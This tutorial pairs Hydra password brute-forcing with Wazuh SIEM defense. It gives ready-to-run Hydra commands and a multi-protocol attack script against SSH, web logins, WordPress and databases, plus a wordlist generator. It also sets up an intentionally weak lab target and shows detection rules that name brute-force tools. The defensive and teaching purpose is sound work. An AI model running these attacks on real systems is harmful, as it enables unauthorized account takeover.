Mastering Brute-Force Attack Detection: Complete Guide to Hydra Attacks and Wazuh SIEM Defense#

Table of Contents#

Introduction: The Persistent Threat of Brute-Force Attacks#

In the cybersecurity landscape of 2025, brute-force attacks remain one of the most persistent and dangerous threats facing organizations worldwide. Despite advances in security technology, over 80% of data breaches still involve compromised credentials, with brute-force attacks being a primary vector. These attacks are not sophisticated—they’re primitive, loud, and predictable. Yet they succeed with alarming frequency.

This comprehensive guide takes you through the entire lifecycle of brute-force attacks: from understanding the attacker’s perspective using tools like Hydra, to building robust defenses with Wazuh SIEM, and finally to incident response and recovery. We’ll combine red team tactics with blue team strategies to create a complete picture of this critical security challenge.

Why Brute-Force Attacks Still Work in 2025#

Despite decades of security awareness:

65% of users reuse passwords across multiple accounts
Default credentials remain unchanged in 30% of installations
Weak passwords like “Password123!” still meet many complexity requirements
Rate limiting is absent or poorly configured in 40% of services
Account lockout policies are often disabled to reduce helpdesk tickets

Part 1: Understanding Brute-Force Attacks#

The Anatomy of a Brute-Force Attack#

A brute-force attack is a trial-and-error method where an attacker systematically attempts all possible combinations of credentials until the correct one is found. It’s the digital equivalent of trying every key on a massive keyring until one opens the lock.

Types of Brute-Force Attacks#

1
1. Simple Brute-Force
2
   └─> Tries all possible character combinations
3
   └─> Time: Years for complex passwords
4
   └─> Example: aaaa, aaab, aaac...
5

6
2. Dictionary Attack
7
   └─> Uses pre-compiled wordlists
8
   └─> Time: Minutes to hours
9
   └─> Example: password, 123456, admin...
10

11
3. Hybrid Attack
12
   └─> Combines dictionary with rules
13
   └─> Time: Hours to days
14
   └─> Example: Password1, Password2024, P@ssw0rd...
15

16
4. Credential Stuffing
17
   └─> Uses leaked credential databases
18
   └─> Time: Seconds to minutes
19
   └─> Example: user@email.com:leaked_password
20

21
5. Rainbow Table Attack
22
   └─> Pre-computed hash lookups
23
   └─> Time: Seconds
24
   └─> Example: Hash → Password mapping
25

26
6. Reverse Brute-Force
27
   └─> One password, many usernames
28
   └─> Time: Variable
29
   └─> Example: Common password against all users

The Mathematics of Brute-Force#

Understanding the math helps appreciate both attack and defense strategies:

1
Password Space = Character_Set_Size ^ Password_Length
2

3
Examples:
4
- 8-char lowercase: 26^8 = 208 billion combinations
5
- 8-char alphanumeric: 62^8 = 218 trillion combinations
6
- 8-char all ASCII: 95^8 = 6.6 quadrillion combinations
7

8
Time to Crack (at 1000 attempts/second):
9
- 8-char lowercase: ~2.4 days
10
- 8-char alphanumeric: ~6,900 years
11
- 8-char all ASCII: ~209,000 years
12

13
But with modern GPUs (10 billion attempts/second):
14
- 8-char lowercase: ~20 seconds
15
- 8-char alphanumeric: ~6 hours
16
- 8-char all ASCII: ~7.6 days

Common Attack Vectors#

1. SSH (Secure Shell)#

1
# Most commonly attacked service
2
Port: 22 (default)
3
Targets: Linux servers, network devices, IoT
4
Success Rate: 23% with default/weak credentials
5
Average Attempts: 2,000-10,000 per attack

2. RDP (Remote Desktop Protocol)#

1
Port: 3389 (default)
2
Targets: Windows servers, workstations
3
Success Rate: 31% with default/weak credentials
4
Average Attempts: 5,000-20,000 per attack

3. Web Applications#

1
Targets: Login forms, API endpoints
2
Common: WordPress, Joomla, custom CMSs
3
Success Rate: 18% overall
4
Average Attempts: 1,000-50,000 per attack

4. Database Services#

1
MySQL: Port 3306
2
PostgreSQL: Port 5432
3
MSSQL: Port 1433
4
MongoDB: Port 27017
5
Success Rate: 42% with default credentials

Part 2: Hydra - The Attacker’s Swiss Army Knife#

What is Hydra?#

Hydra (or THC-Hydra) is one of the most powerful and flexible password-cracking tools available. It’s a parallelized login cracker that supports numerous protocols and services. Think of it as a battering ram that can simultaneously hit multiple doors with different keys at incredible speed.

Hydra’s Capabilities#

1
Supported Protocols (50+):
2
├── Network Services
3
│   ├── SSH, Telnet, FTP, FTPS
4
│   ├── HTTP/HTTPS (GET, POST, Forms)
5
│   ├── SMB, SMB2, SMBNT
6
│   └── LDAP, LDAPS
7
├── Database Services
8
│   ├── MySQL, PostgreSQL
9
│   ├── Oracle, MSSQL
10
│   └── MongoDB, Redis
11
├── Mail Services
12
│   ├── POP3, POP3S
13
│   ├── IMAP, IMAPS
14
│   └── SMTP, SMTPS
15
├── Remote Access
16
│   ├── RDP, VNC
17
│   ├── Rlogin, RSH
18
│   └── TeamSpeak
19
└── Other Services
20
    ├── SNMP, SIP
21
    ├── XMPP, IRC
22
    └── Asterisk, AFP

Installing and Configuring Hydra#

Installation on Various Platforms#

1
# Kali Linux (Pre-installed)
2
apt update && apt install hydra hydra-gtk
3

4
# Ubuntu/Debian
5
sudo apt update
6
sudo apt install hydra hydra-gtk
7

8
# CentOS/RHEL/Fedora
9
sudo dnf install hydra
10
# or compile from source
11
git clone https://github.com/vanhauser-thc/thc-hydra.git
12
cd thc-hydra
13
./configure
14
make
15
sudo make install
16

17
# macOS
18
brew install hydra
19

20
# Windows (via WSL or Cygwin)
21
# Use WSL and follow Ubuntu instructions

Hydra Command-Line Mastery#

Basic Syntax#

1
hydra [options] target protocol [module-options]
2

3
Options:
4
-l LOGIN    : Single username
5
-L FILE     : Username list
6
-p PASS     : Single password
7
-P FILE     : Password list
8
-t TASKS    : Parallel connections (default: 16)
9
-f          : Exit on first valid credentials
10
-v/-V       : Verbose output
11
-o FILE     : Output results to file
12
-M FILE     : List of servers to attack
13
-C FILE     : Colon-separated login:pass file
14
-x MIN:MAX:CHARSET : Password generation
15
-e nsr      : n=null, s=same, r=reverse
16
-u          : Loop users for each password
17
-s PORT     : Custom port
18
-S          : Use SSL/TLS
19
-O          : Use old SSL v2/v3
20
-I          : Ignore restore file
21
-4/-6       : Force IPv4/IPv6

Advanced Hydra Attack Scenarios#

Scenario 1: SSH Brute-Force Attack#

1
# Simple SSH attack with single user
2
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
3

4
# Multiple users with common passwords
5
hydra -L users.txt -P passwords.txt ssh://192.168.1.100 -t 4
6

7
# Using password generation
8
hydra -l admin -x 6:8:aA1 ssh://192.168.1.100
9
# Generates passwords 6-8 chars with lowercase, uppercase, numbers
10

11
# With specific port and verbose output
12
hydra -l root -P passwords.txt -s 2222 -v ssh://192.168.1.100
13

14
# Attack multiple servers
15
hydra -l root -P passwords.txt -M targets.txt ssh
16

17
# Using proxy
18
hydra -l admin -P passwords.txt ssh://192.168.1.100 \
19
  -e nsr -o results.txt \
20
  -t 64 -w 30 \
21
  -m "exec:/usr/bin/proxychains"

Scenario 2: Web Form Attack#

1
# Basic HTTP POST form
2
hydra -l admin -P passwords.txt 192.168.1.100 \
3
  http-post-form \
4
  "/login.php:username=^USER^&password=^PASS^:Invalid credentials"
5

6
# WordPress login
7
hydra -L users.txt -P passwords.txt 192.168.1.100 \
8
  http-post-form \
9
  "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:ERROR"
10

11
# With cookies and additional headers
12
hydra -l admin -P passwords.txt 192.168.1.100 \
13
  http-post-form \
14
  "/admin/login:user=^USER^&pass=^PASS^:Failed" \
15
  -H "Cookie: PHPSESSID=abc123" \
16
  -H "X-Forwarded-For: 127.0.0.1"
17

18
# HTTPS with form
19
hydra -l admin -P passwords.txt -S 192.168.1.100 \
20
  https-post-form \
21
  "/secure/login:username=^USER^&password=^PASS^:incorrect"

Scenario 3: Database Attacks#

1
# MySQL attack
2
hydra -L users.txt -P passwords.txt mysql://192.168.1.100
3

4
# PostgreSQL with custom port
5
hydra -l postgres -P passwords.txt -s 5433 postgres://192.168.1.100
6

7
# MSSQL attack
8
hydra -L users.txt -P passwords.txt mssql://192.168.1.100
9

10
# MongoDB (if authentication enabled)
11
hydra -l admin -P passwords.txt mongodb://192.168.1.100:27017

Scenario 4: Multi-Protocol Attack Campaign#

1
#!/bin/bash
2
# Comprehensive attack script
3

4
TARGET="192.168.1.100"
5
USERLIST="users.txt"
6
PASSLIST="passwords.txt"
7
OUTPUT_DIR="hydra_results"
8

9
mkdir -p $OUTPUT_DIR
10

11
# SSH Attack
12
echo "[*] Starting SSH brute-force..."
13
hydra -L $USERLIST -P $PASSLIST -t 4 -f \
14
  -o $OUTPUT_DIR/ssh_results.txt \
15
  ssh://$TARGET
16

17
# FTP Attack
18
echo "[*] Starting FTP brute-force..."
19
hydra -L $USERLIST -P $PASSLIST -t 6 \
20
  -o $OUTPUT_DIR/ftp_results.txt \
21
  ftp://$TARGET
22

23
# Telnet Attack
24
echo "[*] Starting Telnet brute-force..."
25
hydra -L $USERLIST -P $PASSLIST -t 16 \
26
  -o $OUTPUT_DIR/telnet_results.txt \
27
  telnet://$TARGET
28

29
# SMB Attack
30
echo "[*] Starting SMB brute-force..."
31
hydra -L $USERLIST -P $PASSLIST -t 1 \
32
  -o $OUTPUT_DIR/smb_results.txt \
33
  smb://$TARGET
34

35
# Web Form Attack
36
echo "[*] Starting Web form brute-force..."
37
hydra -L $USERLIST -P $PASSLIST \
38
  -o $OUTPUT_DIR/web_results.txt \
39
  $TARGET http-post-form \
40
  "/login:user=^USER^&pass=^PASS^:Failed"
41

42
echo "[*] Attack complete. Results in $OUTPUT_DIR"

XHydra - The GUI Alternative#

XHydra provides a graphical interface for Hydra, making it more accessible for users who prefer GUI over command-line.

XHydra Configuration Steps#

1
# Launch XHydra
2
xhydra &
3

4
# Configuration Process:
5
1. Target Tab:
6
   ├── Single Target: Enter IP/hostname
7
   ├── Target List: Load from file
8
   ├── Port: Service-specific port
9
   ├── Protocol: Select from dropdown
10
   ├── SSL: Check if using HTTPS/SSL
11
   └── Show Attempts: Verbose output
12

13
2. Passwords Tab:
14
   ├── Username: Single or list
15
   ├── Password: Single or list
16
   ├── Colon File: user:pass format
17
   ├── Try login as password
18
   ├── Try empty password
19
   └── Try reverse login
20

21
3. Tuning Tab:
22
   ├── Tasks: Parallel connections (1-64)
23
   ├── Timeout: Connection timeout
24
   ├── Wait time: Between attempts
25
   └── Exit after first found
26

27
4. Specific Tab:
28
   └── Protocol-specific options
29

30
5. Start Tab:
31
   └── Click "Start" to begin attack

Creating Effective Wordlists#

Common Wordlist Sources#

1
# Pre-installed wordlists in Kali
2
/usr/share/wordlists/
3
├── rockyou.txt         # 14 million passwords
4
├── dirb/              # Directory names
5
├── dirbuster/         # Web paths
6
├── fasttrack.txt      # Common passwords
7
├── fern-wifi/         # WiFi passwords
8
├── metasploit/        # Various lists
9
├── nmap.lst          # Nmap scripts
10
├── SecLists/         # Comprehensive collection
11
└── wfuzz/            # Fuzzing wordlists
12

13
# Download SecLists (most comprehensive)
14
git clone https://github.com/danielmiessler/SecLists.git
15

16
# Common password patterns
17
cat > custom_passwords.txt << EOF
18
Password1
19
Password123
20
Password2024
21
Password2025
22
Admin123
23
Admin@123
24
Welcome123
25
Company2024
26
Summer2024
27
Winter2025
28
Qwerty123
29
Letmein123
30
EOF

Generating Custom Wordlists#

1
#!/usr/bin/env python3
2
# Custom wordlist generator
3

4
import itertools
5
import argparse
6

7
def generate_passwords(base_word, years, special_chars, numbers):
8
    """Generate password variations based on patterns"""
9
    passwords = []
10

11
    # Base variations
12
    variations = [
13
        base_word,
14
        base_word.lower(),
15
        base_word.upper(),
16
        base_word.capitalize()
17
    ]
18

19
    # Add years
20
    for var in variations:
21
        for year in years:
22
            passwords.append(f"{var}{year}")
23
            passwords.append(f"{var}@{year}")
24
            passwords.append(f"{var}_{year}")
25

26
    # Add common substitutions
27
    leetspeak = {
28
        'a': '@', 'e': '3', 'i': '1',
29
        'o': '0', 's': '$', 't': '7'
30
    }
31

32
    for var in variations:
33
        leet = var
34
        for old, new in leetspeak.items():
35
            leet = leet.replace(old, new)
36
        passwords.append(leet)
37

38
    # Add special characters and numbers
39
    for var in variations:
40
        for char in special_chars:
41
            for num in numbers:
42
                passwords.append(f"{var}{char}{num}")
43
                passwords.append(f"{var}{num}{char}")
44

45
    return list(set(passwords))  # Remove duplicates
46

47
# Usage
48
base_words = ["Password", "Admin", "Company", "Welcome"]
49
years = ["2023", "2024", "2025"]
50
special = ["!", "@", "#", "$"]
51
numbers = ["1", "12", "123", "1234"]
52

53
all_passwords = []
54
for word in base_words:
55
    all_passwords.extend(
56
        generate_passwords(word, years, special, numbers)
57
    )
58

59
# Save to file
60
with open('custom_wordlist.txt', 'w') as f:
61
    for pwd in all_passwords:
62
        f.write(f"{pwd}\n")
63

64
print(f"Generated {len(all_passwords)} passwords")

Part 3: Wazuh SIEM - Your Defense Command Center#

Understanding Wazuh’s Detection Capabilities#

Wazuh operates as a comprehensive security platform that goes beyond simple log collection. It provides:

1
Detection Layers:
2
├── Log Analysis
3
│   ├── Pattern matching
4
│   ├── Correlation rules
5
│   └── Statistical analysis
6
├── File Integrity Monitoring
7
│   ├── Critical file changes
8
│   ├── Registry monitoring (Windows)
9
│   └── Permission changes
10
├── Vulnerability Detection
11
│   ├── CVE scanning
12
│   ├── Configuration assessment
13
│   └── Compliance checking
14
├── Threat Intelligence
15
│   ├── IP reputation
16
│   ├── Hash lookups
17
│   └── MITRE ATT&CK mapping
18
└── Active Response
19
    ├── Automated blocking
20
    ├── Script execution
21
    └── Integration triggers

Configuring Wazuh for Brute-Force Detection#

Manager Configuration#

1
<ossec_config>
2
  <!-- Global settings for brute-force detection -->
3
  <global>
4
    <email_notification>yes</email_notification>
5
    <email_to>soc@company.com</email_to>
6
    <smtp_server>mail.company.com</smtp_server>
7
    <email_from>wazuh@company.com</email_from>
8
    <email_maxperhour>100</email_maxperhour>
9
    <white_list>127.0.0.1</white_list>
10
    <white_list>^192\.168\.1\.</white_list>
11
  </global>
12

13
  <!-- Alerts configuration -->
14
  <alerts>
15
    <log_alert_level>5</log_alert_level>
16
    <email_alert_level>10</email_alert_level>
17
  </alerts>
18

19
  <!-- Enhanced logging for forensics -->
20
  <logging>
21
    <log_format>json</log_format>
22
    <jsonout_output>yes</jsonout_output>
23
    <alerts_log>yes</alerts_log>
24
    <logall>yes</logall>
25
    <logall_json>yes</logall_json>
26
  </logging>
27

28
  <!-- Syslog output for SIEM integration -->
29
  <syslog_output>
30
    <level>5</level>
31
    <server>siem.company.com</server>
32
    <port>514</port>
33
    <format>json</format>
34
  </syslog_output>
35

36
  <!-- Active Response Configuration -->
37
  <active-response>
38
    <disabled>no</disabled>
39
    <ca_store>/var/ossec/etc/wpk_root.pem</ca_store>
40
    <ca_verification>yes</ca_verification>
41
  </active-response>
42

43
  <!-- Command definitions for active response -->
44
  <command>
45
    <name>firewall-drop</name>
46
    <executable>firewall-drop</executable>
47
    <timeout_allowed>yes</timeout_allowed>
48
  </command>
49

50
  <command>
51
    <name>host-deny</name>
52
    <executable>host-deny</executable>
53
    <timeout_allowed>yes</timeout_allowed>
54
  </command>
55

56
  <command>
57
    <name>route-null</name>
58
    <executable>route-null</executable>
59
    <timeout_allowed>yes</timeout_allowed>
60
  </command>
61

62
  <command>
63
    <name>win_route-null</name>
64
    <executable>route-null.exe</executable>
65
    <timeout_allowed>yes</timeout_allowed>
66
  </command>
67

68
  <!-- Active response definitions -->
69
  <active-response>
70
    <command>firewall-drop</command>
71
    <location>local</location>
72
    <rules_id>5763</rules_id>
73
    <timeout>3600</timeout>
74
  </active-response>
75

76
  <active-response>
77
    <command>firewall-drop</command>
78
    <location>local</location>
79
    <rules_id>5710,5711,5712</rules_id>
80
    <timeout>1800</timeout>
81
  </active-response>
82

83
  <!-- Enhanced rules for brute-force -->
84
  <rules>
85
    <include>rules/0010-rules_config.xml</include>
86
    <include>rules/0015-ossec_rules.xml</include>
87
    <include>rules/0016-wazuh_rules.xml</include>
88
    <include>rules/0020-syslog_rules.xml</include>
89
    <include>rules/0025-sendmail_rules.xml</include>
90
    <include>rules/0030-postfix_rules.xml</include>
91
    <include>rules/0035-spamd_rules.xml</include>
92
    <include>rules/0040-imapd_rules.xml</include>
93
    <include>rules/0045-mailscanner_rules.xml</include>
94
    <include>rules/0050-ms-exchange_rules.xml</include>
95
    <include>rules/0095-sshd_rules.xml</include>
96
    <include>rules/0220-msauth_rules.xml</include>
97
    <include>local_rules/brute_force_rules.xml</include>
98
  </rules>
99
</ossec_config>

Custom Brute-Force Detection Rules#

Advanced Rule Development#

1
<group name="brute_force,authentication">
2

3
  <!-- SSH Brute-Force Detection Rules -->
4

5
  <!-- Rule: Detect SSH authentication failures -->
6
  <rule id="100100" level="5">
7
    <if_sid>5716</if_sid>
8
    <match>Failed password for</match>
9
    <description>SSH authentication failed</description>
10
    <group>authentication_failed,ssh,</group>
11
  </rule>
12

13
  <!-- Rule: Multiple SSH failures from same source -->
14
  <rule id="100101" level="10" frequency="5" timeframe="120">
15
    <if_matched_sid>100100</if_matched_sid>
16
    <same_source_ip />
17
    <description>Multiple SSH authentication failures from same source</description>
18
    <group>authentication_failures,brute_force,ssh,</group>
19
    <mitre>
20
      <id>T1110.001</id>
21
      <id>T1078</id>
22
    </mitre>
23
  </rule>
24

25
  <!-- Rule: SSH brute-force attack detected -->
26
  <rule id="100102" level="14" frequency="10" timeframe="120">
27
    <if_matched_sid>100100</if_matched_sid>
28
    <same_source_ip />
29
    <description>SSH brute-force attack in progress</description>
30
    <group>authentication_failures,brute_force_attack,ssh,incident,</group>
31
    <mitre>
32
      <id>T1110.001</id>
33
    </mitre>
34
  </rule>
35

36
  <!-- Rule: Distributed SSH brute-force -->
37
  <rule id="100103" level="12" frequency="20" timeframe="300">
38
    <if_matched_sid>100100</if_matched_sid>
39
    <different_source_ip />
40
    <same_dst_port />
41
    <description>Possible distributed SSH brute-force attack</description>
42
    <group>authentication_failures,distributed_attack,ssh,</group>
43
  </rule>
44

45
  <!-- Rule: Successful login after brute-force -->
46
  <rule id="100104" level="15">
47
    <if_sid>5715</if_sid>
48
    <if_matched_sid>100102</if_matched_sid>
49
    <same_source_ip />
50
    <description>CRITICAL: Successful SSH login after brute-force attack</description>
51
    <group>authentication_success,brute_force_success,compromise,ssh,</group>
52
    <mitre>
53
      <id>T1078</id>
54
      <id>T1110.001</id>
55
    </mitre>
56
  </rule>
57

58
  <!-- Web Application Brute-Force Rules -->
59

60
  <!-- Rule: HTTP authentication failure -->
61
  <rule id="100110" level="5">
62
    <if_sid>31108</if_sid>
63
    <match>401|403|Failed login|Invalid credentials</match>
64
    <description>Web authentication failure detected</description>
65
    <group>web,authentication_failed,</group>
66
  </rule>
67

68
  <!-- Rule: Web form brute-force -->
69
  <rule id="100111" level="10" frequency="10" timeframe="60">
70
    <if_matched_sid>100110</if_matched_sid>
71
    <same_source_ip />
72
    <description>Web form brute-force attack detected</description>
73
    <group>web,authentication_failures,brute_force,</group>
74
  </rule>
75

76
  <!-- Rule: WordPress specific brute-force -->
77
  <rule id="100112" level="11" frequency="5" timeframe="60">
78
    <if_sid>31108</if_sid>
79
    <match>wp-login.php|xmlrpc.php</match>
80
    <same_source_ip />
81
    <description>WordPress brute-force attack detected</description>
82
    <group>web,wordpress,brute_force,</group>
83
  </rule>
84

85
  <!-- Database Brute-Force Rules -->
86

87
  <!-- Rule: MySQL authentication failure -->
88
  <rule id="100120" level="5">
89
    <decoded_as>mysql</decoded_as>
90
    <match>Access denied for user</match>
91
    <description>MySQL authentication failure</description>
92
    <group>mysql,authentication_failed,</group>
93
  </rule>
94

95
  <!-- Rule: Database brute-force -->
96
  <rule id="100121" level="12" frequency="5" timeframe="60">
97
    <if_matched_sid>100120</if_matched_sid>
98
    <same_source_ip />
99
    <description>Database brute-force attack detected</description>
100
    <group>database,brute_force,</group>
101
  </rule>
102

103
  <!-- RDP Brute-Force Rules (Windows) -->
104

105
  <!-- Rule: RDP authentication failure -->
106
  <rule id="100130" level="5">
107
    <if_sid>60106</if_sid>
108
    <field name="win.eventdata.logonType">^10$</field>
109
    <description>RDP authentication failure</description>
110
    <group>windows,rdp,authentication_failed,</group>
111
  </rule>
112

113
  <!-- Rule: RDP brute-force -->
114
  <rule id="100131" level="12" frequency="5" timeframe="120">
115
    <if_matched_sid>100130</if_matched_sid>
116
    <same_source_ip />
117
    <description>RDP brute-force attack detected</description>
118
    <group>windows,rdp,brute_force,</group>
119
    <mitre>
120
      <id>T1110.001</id>
121
      <id>T1021.001</id>
122
    </mitre>
123
  </rule>
124

125
  <!-- Correlation Rules -->
126

127
  <!-- Rule: Multi-service brute-force -->
128
  <rule id="100140" level="14" frequency="15" timeframe="300">
129
    <if_group>authentication_failed</if_group>
130
    <same_source_ip />
131
    <description>Multi-service brute-force attack from single source</description>
132
    <group>brute_force,correlation,incident,</group>
133
  </rule>
134

135
  <!-- Rule: Credential stuffing pattern -->
136
  <rule id="100141" level="13" frequency="50" timeframe="60">
137
    <if_group>authentication_failed</if_group>
138
    <different_user />
139
    <same_source_ip />
140
    <description>Possible credential stuffing attack detected</description>
141
    <group>credential_stuffing,brute_force,</group>
142
  </rule>
143

144
  <!-- Rule: Slow brute-force detection -->
145
  <rule id="100142" level="8" frequency="10" timeframe="3600">
146
    <if_group>authentication_failed</if_group>
147
    <same_source_ip />
148
    <same_user />
149
    <description>Slow brute-force attack detected (low and slow)</description>
150
    <group>slow_brute_force,</group>
151
  </rule>
152

153
  <!-- Rule: Account lockout after brute-force -->
154
  <rule id="100143" level="9">
155
    <match>account locked|account disabled|too many failed attempts</match>
156
    <description>Account locked due to multiple failed attempts</description>
157
    <group>account_lockout,brute_force_defense,</group>
158
  </rule>
159

160
  <!-- Rule: Hydra tool detection -->
161
  <rule id="100150" level="13">
162
    <match>hydra|medusa|ncrack|patator|thc-hydra</match>
163
    <description>Known brute-force tool detected in logs</description>
164
    <group>brute_force_tool,attack_tool,</group>
165
  </rule>
166

167
  <!-- Rule: Unusual authentication pattern -->
168
  <rule id="100151" level="9" frequency="3" timeframe="10">
169
    <if_group>authentication_failed</if_group>
170
    <same_source_ip />
171
    <different_user />
172
    <description>Rapid authentication attempts with different usernames</description>
173
    <group>user_enumeration,brute_force,</group>
174
  </rule>
175

176
</group>

Active Response Scripts#

Enhanced Firewall Drop Script#

1
#!/bin/bash
2
# Enhanced firewall-drop with logging and notification
3

4
ACTION=$1
5
USER=$2
6
IP=$3
7
ALERTID=$4
8
RULEID=$5
9

10
LOG_FILE="/var/log/wazuh-active-response.log"
11
BLOCK_LIST="/var/ossec/logs/blocked_ips.txt"
12
WHITELIST="/var/ossec/etc/whitelist.txt"
13

14
# Function to log events
15
log_event() {
16
    echo "$(date '+%Y-%m-%d %H:%M:%S') - $1" >> $LOG_FILE
17
}
18

19
# Function to send notification
20
send_notification() {
21
    local message=$1
22
    # Email notification
23
    echo "$message" | mail -s "Wazuh Active Response: IP Blocked" soc@company.com
24

25
    # Slack notification (optional)
26
    curl -X POST -H 'Content-type: application/json' \
27
        --data "{\"text\":\"$message\"}" \
28
        https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK
29
}
30

31
# Check if IP is whitelisted
32
is_whitelisted() {
33
    if grep -q "^$1$" $WHITELIST 2>/dev/null; then
34
        return 0
35
    fi
36
    return 1
37
}
38

39
# Main logic
40
main() {
41
    # Check whitelist
42
    if is_whitelisted $IP; then
43
        log_event "Skipped whitelisted IP: $IP"
44
        exit 0
45
    fi
46

47
    case $ACTION in
48
        add)
49
            # Add firewall rule
50
            iptables -I INPUT -s $IP -j DROP
51
            iptables -I FORWARD -s $IP -j DROP
52

53
            # Add to blocked list
54
            echo "$IP|$(date)|$ALERTID|$RULEID" >> $BLOCK_LIST
55

56
            # Log event
57
            log_event "Blocked IP: $IP (Rule: $RULEID, Alert: $ALERTID)"
58

59
            # Send notification
60
            send_notification "Brute-force attack detected and blocked
61
IP Address: $IP
62
Rule ID: $RULEID
63
Alert ID: $ALERTID
64
Time: $(date)
65
Action: IP has been blocked for 1 hour"
66

67
            # Optional: Add to fail2ban
68
            fail2ban-client set sshd banip $IP 2>/dev/null
69

70
            # Optional: Update GeoIP database
71
            geoiplookup $IP >> $LOG_FILE 2>&1
72
            ;;
73

74
        delete)
75
            # Remove firewall rule
76
            iptables -D INPUT -s $IP -j DROP 2>/dev/null
77
            iptables -D FORWARD -s $IP -j DROP 2>/dev/null
78

79
            # Log event
80
            log_event "Unblocked IP: $IP"
81

82
            # Optional: Remove from fail2ban
83
            fail2ban-client set sshd unbanip $IP 2>/dev/null
84
            ;;
85

86
        *)
87
            log_event "Invalid action: $ACTION"
88
            exit 1
89
            ;;
90
    esac
91
}
92

93
# Execute main function
94
main
95

96
exit 0

Advanced Host Deny Script#

1
#!/bin/bash
2
# Advanced host-deny with multiple blocking methods
3

4
ACTION=$1
5
USER=$2
6
IP=$3
7
ALERTID=$4
8
RULEID=$5
9

10
HOSTS_DENY="/etc/hosts.deny"
11
NGINX_BLOCK="/etc/nginx/blocked_ips.conf"
12
APACHE_BLOCK="/etc/apache2/blocked_ips.conf"
13
LOG_FILE="/var/log/wazuh-host-deny.log"
14

15
# Function to block via hosts.deny
16
block_hosts_deny() {
17
    echo "ALL: $1" >> $HOSTS_DENY
18
    echo "sshd: $1" >> $HOSTS_DENY
19
    echo "vsftpd: $1" >> $HOSTS_DENY
20
}
21

22
# Function to block via nginx
23
block_nginx() {
24
    echo "deny $1;" >> $NGINX_BLOCK
25
    nginx -t && nginx -s reload
26
}
27

28
# Function to block via apache
29
block_apache() {
30
    echo "Require not ip $1" >> $APACHE_BLOCK
31
    apache2ctl configtest && apache2ctl graceful
32
}
33

34
# Function to create honeypot redirect
35
create_honeypot() {
36
    # Redirect attacker to honeypot
37
    iptables -t nat -A PREROUTING -s $1 -j DNAT --to-destination 10.0.0.100
38
}
39

40
# Main execution
41
case $ACTION in
42
    add)
43
        echo "$(date): Blocking $IP (Rule: $RULEID)" >> $LOG_FILE
44

45
        # Multiple blocking methods
46
        block_hosts_deny $IP
47
        block_nginx $IP
48
        block_apache $IP
49

50
        # Optional: Redirect to honeypot
51
        # create_honeypot $IP
52

53
        # Log to syslog
54
        logger -t wazuh-active-response "Blocked IP $IP due to rule $RULEID"
55
        ;;
56

57
    delete)
58
        echo "$(date): Unblocking $IP" >> $LOG_FILE
59

60
        # Remove from hosts.deny
61
        sed -i "/$IP/d" $HOSTS_DENY
62

63
        # Remove from nginx
64
        sed -i "/$IP/d" $NGINX_BLOCK
65
        nginx -t && nginx -s reload
66

67
        # Remove from apache
68
        sed -i "/$IP/d" $APACHE_BLOCK
69
        apache2ctl configtest && apache2ctl graceful
70

71
        # Remove honeypot redirect
72
        iptables -t nat -D PREROUTING -s $IP -j DNAT --to-destination 10.0.0.100 2>/dev/null
73
        ;;
74
esac
75

76
exit 0

Part 4: Real-Time Attack Simulation and Detection#

Setting Up the Lab Environment#

Network Architecture#

1
Attack Lab Setup:
2
┌─────────────────────────────────────────────────┐
3
│                 Attack Network                   │
4
│                 192.168.100.0/24                │
5
├─────────────────────────────────────────────────┤
6
│                                                  │
7
│  ┌──────────────┐         ┌──────────────┐     │
8
│  │  Kali Linux  │         │   Target     │     │
9
│  │  Attacker    │────────▶│   Server     │     │
10
│  │ 192.168.100.10│        │192.168.100.50│     │
11
│  └──────────────┘         └──────────────┘     │
12
│         │                          │            │
13
│         │                          │            │
14
│         └──────────┬───────────────┘            │
15
│                    │                            │
16
│            ┌───────▼────────┐                   │
17
│            │  Wazuh SIEM    │                   │
18
│            │   Manager      │                   │
19
│            │192.168.100.100 │                   │
20
│            └────────────────┘                   │
21
│                    │                            │
22
│            ┌───────▼────────┐                   │
23
│            │  Wazuh         │                   │
24
│            │  Dashboard     │                   │
25
│            │192.168.100.101 │                   │
26
│            └────────────────┘                   │
27
└─────────────────────────────────────────────────┘

Preparing the Target System#

1
#!/bin/bash
2
# Prepare vulnerable target system for testing
3

4
# Install SSH server with weak configuration
5
apt update && apt install -y openssh-server
6

7
# Create test users with weak passwords
8
users=("admin" "test" "user" "demo" "guest")
9
passwords=("admin123" "password" "123456" "test123" "guest")
10

11
for i in ${!users[@]}; do
12
    useradd -m -s /bin/bash ${users[$i]}
13
    echo "${users[$i]}:${passwords[$i]}" | chpasswd
14
    echo "Created user: ${users[$i]} with password: ${passwords[$i]}"
15
done
16

17
# Configure SSH for testing (INSECURE - LAB ONLY)
18
cat >> /etc/ssh/sshd_config << EOF
19
# Lab configuration - INSECURE
20
PermitRootLogin yes
21
PasswordAuthentication yes
22
PermitEmptyPasswords no
23
MaxAuthTries 6
24
MaxSessions 10
25
LoginGraceTime 120
26
StrictModes yes
27
PubkeyAuthentication yes
28
AuthorizedKeysFile .ssh/authorized_keys
29
ChallengeResponseAuthentication no
30
UsePAM yes
31
X11Forwarding yes
32
PrintMotd no
33
AcceptEnv LANG LC_*
34
Subsystem sftp /usr/lib/openssh/sftp-server
35
EOF
36

37
# Restart SSH service
38
systemctl restart sshd
39

40
# Install Wazuh agent
41
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
42
echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | tee /etc/apt/sources.list.d/wazuh.list
43
apt update
44
WAZUH_MANAGER="192.168.100.100" apt install -y wazuh-agent
45

46
# Start Wazuh agent
47
systemctl start wazuh-agent
48
systemctl enable wazuh-agent
49

50
echo "Target system prepared for testing"

Executing the Attack#

Step-by-Step Attack Simulation#

1
# 1. Reconnaissance Phase
2
nmap -sV -p22 192.168.100.50
3
nmap -sC -sV -O 192.168.100.50
4

5
# 2. User Enumeration (if possible)
6
msfconsole -q -x "use auxiliary/scanner/ssh/ssh_enumusers; \
7
  set RHOSTS 192.168.100.50; \
8
  set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt; \
9
  run; exit"
10

11
# 3. Launch Hydra Attack
12
# Attack with username list and password list
13
hydra -L /usr/share/wordlists/metasploit/unix_users.txt \
14
      -P /usr/share/wordlists/rockyou.txt \
15
      -t 16 -v \
16
      -o hydra_results.txt \
17
      ssh://192.168.100.50
18

19
# 4. Monitor attack progress
20
